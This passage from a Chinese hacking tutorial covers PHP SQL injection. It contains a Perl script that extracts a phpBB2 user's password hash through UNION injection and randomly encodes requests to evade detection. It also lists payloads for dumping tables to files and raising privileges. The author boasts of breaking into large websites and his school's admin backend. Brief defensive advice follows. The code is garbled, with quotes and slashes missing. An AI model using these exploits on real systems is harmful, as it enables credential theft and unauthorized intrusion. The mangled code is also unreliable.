# WHERE s.session_id = '$session_id'
# AND u.user_id = s.session_user_id
# AND p.topic_id = $topic_id
# AND p.post_time = u.user_lastvisit
# ORDER BY p.post_time ASC
# LIMIT 1;
Rick提供了下面的这断测试代码
use IOSocket;
$remote = shift 'localhost';
$view_topic = shift 'phpBB2viewtopic.php';
$uid = shift 2;
$port = 80;
$dbtype = 'mysql4'; # mysql4 or pgsql
print Trying to get password hash for uid $uid server $remote dbtype $dbtypen;
$p = ;
for($index=1; $index=32; $index++)
{
$socket = IOSocketINET-new(PeerAddr = $remote,
PeerPort = $port,
Proto = tcp,
Type = SOCK_STREAM)
or die Couldnt connect to $remote$port [email=$@n]$@n[/email];
$str = GET $view_topic . sid=1&topic_id=-1 . random_encode(make_dbsql()) . &view=newest . HTTP1.0nn;
print $socket $str;
print $socket Cookie phpBB2mysql_sid=1n; # replace this for pgsql or remove it
print $socket Host $remotenn;
while ($answer = $socket)
{
if ($answer =~ location.x23(d+)) # Matches the location viewtopic.phpp=num#num
{
$p .= chr ($1);
}
}
close($socket);
}
print nMD5 Hash for uid $uid is $pn;
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = ;
for($i=0; $ilength($str); $i++)
{
$c = substr($str,$i,1);
$j = rand length($str) 1000;
if (int($j) % 2 $c eq ' ')
{
$ret .= % . sprintf(%x,ord($c));
}
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dbtype eq 'mysql4')
{
return union select ord(substring(user_password, . $index . ,1)) from phpbb_users where user_id=$uid ;
} elsif ($dbtype eq 'pgsql')
{
return ; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users
u where u.user_id=$uid or false;
}
else
{
return ;
}
}
这断代码,我就不多做解释了.作用是获得HASH值.
看到这里,大家可能有点疑问,为什么我前面讲的那些改的函数怎么没有用到,我讲出来不怕大家笑话其实网上很多站点有些页面的查询语句
看起来会是这样
display.phpsqlsave=select++from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,这是真的,我还靠这个进过几个大型网站.至于哪一些,不好讲出来,不过我们学校的网站,我就是靠这个进后台的(希望学校网络中心的看
不到这篇文章,^_^).把前面那函数用上吧.不然你只有改人家的密码了哦!!!
差点忘了一点,在SQL注入的时候,PHP与ASP有所不同,MySQL对sql语句的运用没有mssql灵活,因此,很多在mssql上可以用的查询语句在mysql
数据库中都不能奏效了. 一般我们常见的注入语句像这样aaa.phpid=a' into outfile 'pass.txt或是aaa.phpid=a' into outfile 'pass.txt'
再进一步可以改成aaa.phpid=a' or 1=1 union select id,name,password form users into outfile 'ca.txt
这样可以将数据库数据导出为文件,然后可以查看.
或是这样mode=',user_level='4
这个语句一般用在修改资料时,假设页面存在漏洞的话,就可以达到提升权限的做用.
其它的如' OR 1=1 -- 或者1' or 1='1则跟asp差不多.这里不多讲了.在php里面,SQL注入看来还是漏洞之首啊,有太多的页面存在这个问题了.
其实大家可以看出来,上面那些分类归根结底只有一个原因提交参数没过滤或是过滤不够严谨.黑客防线向来有攻有守.这里,就大致讲一下
防范的方法吧.
首先,我个人认为最重要的一点是将magic_quotes_gpc高为ON,它的作用是将单引号,双引号,反斜线,和空字符转换为含有反斜线的字符,如
select from admin where username='$username' and password='$password'语句,攻击者想用1' or 1='1跳过验证,但是,那些字符串将被转
换成这样select from admin where username='a' and password='1' or 1='1'从而达到阻止注入的目的,事实也就是自动进行了addslashes
()操作.再不行的话,自己定义函数处理吧.现在看来,那些搞PHP注入的人也比较郁闷,因为myslq4以下版本不支持子语句,而新版本的mysql又会
将magic_quotes_gpc选项默认为开.
解决包含文件漏洞用的方法就是要求程序员包含文件里的参数尽量不要使用变量，如果使用变量，就一定要严格检查要包含的文件名，绝
对不能由用户任意指定,建议设global_variables为off。如前面文件打开中限制PHP操作路径是一个必要的选项。另外，如非特殊需要，一定要
关闭PHP的远程文件打开功能。修改php.ini文件：allow_url_fopen = Off(注参见PHP安全问题：远程溢出、DoS、safe_mode绕过漏洞).
还有一点我觉得很多网站都会有这个问题,就是没有关错误显示.轻一看可能没什么,但是一些盯了很久(用词有点不对哦)的人就可以通过错
误提示来获得如数据库信息,网页文件物理路径等等.

‘拾’ 关于目录遍历漏洞

这只是你的web服务器允许了目录列表。
提供具体的服务器类型（IIS？Apache？）和版本，告诉你怎么配置。